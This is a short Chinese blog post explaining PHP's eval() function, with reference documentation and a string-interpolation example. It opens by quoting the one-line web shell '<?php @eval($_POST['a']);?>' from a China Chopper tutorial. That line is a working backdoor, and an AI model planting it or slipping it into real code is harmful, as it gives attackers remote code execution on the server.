【php】eval()函数的使用

再看【中国菜刀】软件的使用教程中,发现PHP的一段代码,用到了eval函数,但是不是很了解,请看如下代码:

<?php @eval($_POST['a']);?>

于是在网上查了下资料,原来是将参数的值按php语法代码进行执行!请看如下资料:

定义和用法

eval() 函数把字符串按照 PHP 代码来计算。

该字符串必须是合法的 PHP 代码,且必须以分号结尾。

如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false。

语法

eval(phpcode)
参数 描述
phpcode 必需。规定要计算的 PHP 代码。

提示和注释

注释:返回语句会立即终止对字符串的计算。

注释:该函数对于在数据库文本字段中供日后计算而进行的代码存储很有用。

例子

<?php
$string = "beautiful";
$time = "winter";

$str = 'This is a $string $time morning!';
echo $str. "<br />";

eval("\$str = \"$str\";");
echo $str;
?>

输出:

This is a $string $time morning!
This is a beautiful winter morning!

Author: jhonse

Jhonse技术博客: http://blog.jhonse.com

Leave a Reply

Your email address will not be published. Required fields are marked *